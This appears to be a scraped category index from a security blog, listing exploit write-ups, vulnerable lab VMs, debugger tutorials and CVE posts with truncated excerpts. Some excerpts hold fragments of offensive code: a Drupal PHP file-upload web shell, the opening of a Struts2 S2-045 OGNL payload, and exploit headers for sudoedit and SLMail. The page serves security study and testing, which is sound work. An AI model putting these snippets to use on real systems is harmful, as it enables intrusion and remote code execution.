Vulnerability Analysis
文章平均质量分 64
Nixawk
这个作者很懒,什么都没留下…
展开
-
exploit - dahua camera backdoor
Just for security assessment. If you can exploit the dahua camera devices, username/password/cookies can be used to access camera video.Exploit CodeI’ll share it later.$ python exploit_dahua.py 192.168原创 2017-03-17 17:13:15 · 11065 阅读 · 0 评论 -
Network - Wireshark decrypts SSL Traffic
Step one – set up an SSL-protected server to use as a testbedTo illustrate the process, we’re going to use OpenSSL to generate a certificate and act as a web server running HTTP over SSL (aka HTTPS) –转载 2015-10-18 15:05:29 · 836 阅读 · 0 评论 -
Security Lab
Following table gives the URLs of all the vulnerable web applications,operating system installations, old software and war games [hacking] sites. TheURLs for individual applications that are part of o原创 2014-08-10 22:40:16 · 2497 阅读 · 0 评论 -
CVE - 20152509
Please enable Windows Media Center from media feature.# Title: MS15-100 Windows Media Center Command Execution# Date : 11/09/2015# Author: R-73eN# Software: Windows Media Center# Tested : Windows 7原创 2015-09-14 08:56:31 · 552 阅读 · 0 评论 -
exploit - Sudo <=1.8.14 - Unauthorized Privilege
# Exploit Title: sudo -e - a.k.a. sudoedit - unauthorized privilege escalation# Date: 07-23-2015# Exploit Author: Daniel Svartman# Version: Sudo <=1.8.14# Tested on: RHEL 5/6/7 and Ubuntu (all ver原创 2015-08-06 16:15:26 · 792 阅读 · 0 评论 -
UPnP
What is UPnPFrom Wikipedia: Universal Plug and Play (UPnP) is a set of networking protocols that permits networked devices, such as personal computers, printers, Internet gateways, Wi-Fi access points原创 2015-08-04 08:32:07 · 1664 阅读 · 0 评论 -
Lab - Darknet
Please do it yourself. Really nice job !Dir BruterPermission CheckVirtual HostSQLite Injection / GetShellXPath InjectionCrack PIN / Upload FileSuphpReferenceshttps://research.g0blin.co.uk/vul原创 2015-07-16 16:13:30 · 966 阅读 · 0 评论 -
Lab - ROP Primer
Downloadhttp://download.vulnhub.com/rop-primer/rop-primer-v0.2.ovaExploitlevel0@rop:~$ cat exploit.py #!/usr/bin/env python2# -*- coding: utf8 -*-import structdef p(x): return struct.pack('<L', x转载 2015-07-14 00:56:45 · 2264 阅读 · 0 评论 -
Lab - Hackademic -RTB2
DescriptionHackademic RTB2 is the second edition of Hackademic vulnerable Virtual Machine. The first challenge is described here. InstallationHackademic RTB2 can be downloaded from following places:ht原创 2015-07-12 11:34:25 · 3851 阅读 · 0 评论 -
python - scapy - fuzz
Start a tcp sniffer, and monitor tcp response. We can find surprise at sometimes.>>> sniff(prn=lambda x:x.show(), filter="(tcp port 80) and (ip dst 192.168.1.107 or ip src 192.168.1.107)")###[ Etherne原创 2015-05-24 12:19:37 · 1780 阅读 · 0 评论 -
Exploit writing tutorial part1: Stack Based Overflows
Author: Corelan Team (corelanc0d3r) Modify: Nixawk This tutorial will show you how to exploit a software from stack overflow.RequirementsSoftware: Easy RM to MP3 Converter Version 2.7.3.700.2006.09转载 2015-06-28 14:30:46 · 2318 阅读 · 0 评论 -
python - scapy - dns sniffer / posioning
How to parse dns request and response ? Scapy is a powerful tool, and it can help us for dns detail.#!/usr/bin/env python# -*- coding: utf8 -*-"""execte demo py with root privilege, and finish double原创 2015-05-23 11:38:09 · 6339 阅读 · 0 评论 -
windbg - Getting Started with WinDBG - Part 2
This is a multipart series walking you through using WinDBG - we’ve gotten you off the ground with our last blog post, and now we’ll focus on it’s core functionality so that you can start debugging pro转载 2015-06-24 18:22:12 · 734 阅读 · 0 评论 -
windbg - Byakugan
1. Install Byakuganlab:bin/ $ pwd/home/someone/metasploit-framework/external/source/byakugan/binlab:bin/ $ tree.├── Vista│ ├── byakugan.dll│ ├── detoured.dll│ └── injectsu.dll├── Win7│原创 2015-06-22 23:12:08 · 1560 阅读 · 0 评论 -
Drupal - upload shell with admin privilege
login drupal with admin username and password.enable PHP FilterAdd content with PHP Code<?phpif(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $userfile_name = $_FILES[原创 2015-06-04 18:46:41 · 1572 阅读 · 0 评论 -
windbg - Getting Started with WinDBG - Part3
In this series of blog posts we’ve walked you through getting WinDBG installed, setup, and got you started by attaching to a process and setting breakpoints. Our next step is the actual debugging part转载 2015-06-24 19:50:51 · 631 阅读 · 0 评论 -
windbg - Getting Started with WinDBG - Part 1
IntroductionWinDBG is an awesome debugger. It may not have a pretty interface or black background by default, but it still one of the most powerful and stable Windows debuggers out there. In this artic转载 2015-06-24 15:52:24 · 1122 阅读 · 0 评论 -
exploit - Immunity Debugger - PyCommands List
PyCommand Description================= ============================================================================================acrocache Dumps Acrobat Reader Cache state原创 2015-06-23 20:57:27 · 907 阅读 · 0 评论 -
Joomla - Error-Based SQL Injection
DescriptionTrustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). CVE原创 2015-10-24 13:26:42 · 2086 阅读 · 0 评论 -
AES
Encrypt / Decrypt DemosEncryption:openssl aes-256-cbc -in attack-plan.txt -out message.enc oropenssl aes-256-cbc -in attack-plan.txt -aor┌─[✗]─[lab@core]─[/tmp]└──╼ aescrypt -husage: aescrypt {-原创 2015-10-13 23:34:59 · 462 阅读 · 0 评论 -
exploit - CVE-2017-5638 - Apache Struts2 S2-045
Metasploit-FrameworkExp Code#!/usr/bin/python# -*- coding: utf-8 -*-import urllib2import httplibdef exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlCo原创 2017-03-07 17:13:45 · 5665 阅读 · 1 评论 -
Router - Netgear Remote Command Injection
DescriptionNETGEAR is aware of the security issue #582384 that allows unauthenticated web pages to pass form input directly to the command-line interface. A remote attacker can potentially inject arbit原创 2016-12-15 14:33:27 · 656 阅读 · 0 评论 -
Vuln - Cisco - CVE-2016-6415 - IKE Information Disclosure
Summary A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to ret原创 2016-09-29 21:26:54 · 1479 阅读 · 0 评论 -
Vuln - Cisco - CVE-2016-6366
https://github.com/RiskSense-Ops/CVE-2016-6366/Exploit Cisco CVE-2016-6366msf auxiliary(snmp_login) > set PASSWORD publicPASSWORD => publicmsf auxiliary(snmp_login) > set RHOSTS 192.168.206.114RHOST原创 2016-09-26 16:46:57 · 2969 阅读 · 0 评论 -
vuln - SugarCRM 6.5.23 - REST PHP Object Injection Exploit
Deploy a vuln labPlease install docker yourself.#!/bin/bashdocker build -t sugarcrm:CVE-2016-7124 -f Dockerfile .docker run -p 3306:3306 -p 80:80 sugarcrm:CVE-2016-7124Dockerfile# docker php tag list原创 2016-09-15 00:07:05 · 1293 阅读 · 0 评论 -
How to scan whole Internet 3.7 billion IP addresses in few minutes?
Cyber security audit and ethical hacking training professionals normally use scanner to scans the networks. Scanning every IP address on the internet isn’t an easy job, and if you don’t have the resour转载 2016-09-12 18:13:49 · 596 阅读 · 0 评论 -
exploit - SLMail 5.5 - POP3 PASS Buffer Overflow Exploit
https://www.exploit-db.com/exploits/638/#!/usr/bin/python# -*- encoding: utf-8 -*-import sysimport socketimport struct## OS Name: Microsoft Windows XP Professional# OS Version:原创 2016-07-26 22:30:52 · 3268 阅读 · 0 评论 -
exploit - ClamAV servers vulnerable to unauthenticated clamav comand execution.
ClamAV® is an open source antivirus engine for detecting trojans, viruses, malware & other malicious threats.Setup Clamav Environment$ sudo apt-get install clamav clamav-daemon$ sudo freshclam$ sudo原创 2016-06-14 10:51:14 · 951 阅读 · 0 评论 -
CVE-2015-7755: Juniper ScreenOS Authentication Backdoor
On December 18th, 2015 Juniper issued an advisory indicating that they had discovered unauthorized code in the ScreenOS software that powers their Netscreen firewalls. This advisory covered two distinc转载 2015-12-21 21:44:53 · 1768 阅读 · 0 评论 -
Fuzz - Sulley Framework
OS Name: Microsoft Windows XP ProfessionalOS Version: 5.1.2600 Service Pack 3 Build 2600Install Sulley Frameworkhttps://github.com/OpenRCE/sulley/wiki/Windows-Installa原创 2016-03-10 16:36:30 · 1904 阅读 · 0 评论 -
Vuln - Synology NAS DSM 5.2 Remote Code Execution (RCE)
TLDRRCE in Synology NAS DSM 5.2 due to lack of input sanitisation. RCE triggered indirectly via port forwarding mechanism in the NAS UI.Getting startedI recently bought a Synology DS416 NAS and noticed转载 2016-02-23 13:04:28 · 2104 阅读 · 0 评论 -
Lab - ElasticSearch Search Groovy Sandbox Bypass
Download: https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-0Elasticsearch is a search server based on Lucene. It provides a distributed, multitenant-capable full-text search engine with原创 2016-03-05 08:48:57 · 2061 阅读 · 0 评论 -
Exploit - Fortigate SSH Backdoor
root@Exploit-Fortigate-SSH-Backdoor:~# python fortigate.py 192.168.1.100DEBUG:paramiko.transport:starting thread (client mode): 0xb6f81e0cLDEBUG:paramiko.transport:Local version/idstring: SSH-2.0-par原创 2016-01-15 00:37:25 · 2041 阅读 · 0 评论 -
Lab - Install OpenNMS on Kali Linux
When you install openNMS successfully, you can access web page http://localhost:8980 with credentials [admin / admin].Download OpenNMSAccess page, and download related files: - openNMS - jicmp原创 2016-02-14 17:44:30 · 1757 阅读 · 0 评论 -
Basic Linux Privilege Escalation
Before starting, I would like to point out - I’m noexpert. As far as I know, there isn’t a “magic”answer, in this huge area. This is simply my finding, typed up, tobe shared(my startingpoint). Bel转载 2014-08-27 20:01:10 · 1607 阅读 · 0 评论 -
Remote Debugging with IDA Pro
How to debug linux program on Windows ?Windows: (IP: 192.168.1.105) Linux: (IP: 192.168.1.103)Windows (IDA Pro)Install IDA Pro 6.8 on Windows.Create a share folder linux in C:\PROGRA~1\IDA6.8copy li原创 2016-01-21 15:04:38 · 1348 阅读 · 0 评论 -
Metasploit - jenkins_java_deserialize
Standup a Jenkins server version 1.637 or lower:wget http://mirrors.jenkins-ci.org/war/1.637/jenkins.warjava -jar jenkins.warRun the following exploit in msfconsole:use exploit/linux/misc/jenkins_java转载 2015-12-12 13:05:43 · 1427 阅读 · 0 评论 -
exploit - write metasploit exploit script
Create Vuln ServerCompile the source code with VC6.0 / Dev C++. #include <iostream.h>#include <stdio.h>#include <winsock.h>#include <windows.h>//load windows socket#pragma comment(lib, "wsock32.lib原创 2015-06-22 19:23:33 · 1663 阅读 · 1 评论 -
exploit - mona.py - the manual
mona.pyInstall mona.pyPut mona.py into C:\Program Files\Immunity Inc\Immunity Debugger\PyCommandsBasic usageOpen Immunity Debugger. At the bottom of the application you should see an input box (comm原创 2015-02-27 14:07:31 · 3638 阅读 · 0 评论 -
connect wireless with command
iw(list/config) can only handle WEP.You need wpa-supplicant for this.sudo apt-get install wpasupplicantIn /etc/wpa_supplicant.conf you put your ssid and password.gksu gedit /etc/wpa_supplican原创 2014-09-11 22:23:28 · 1097 阅读 · 0 评论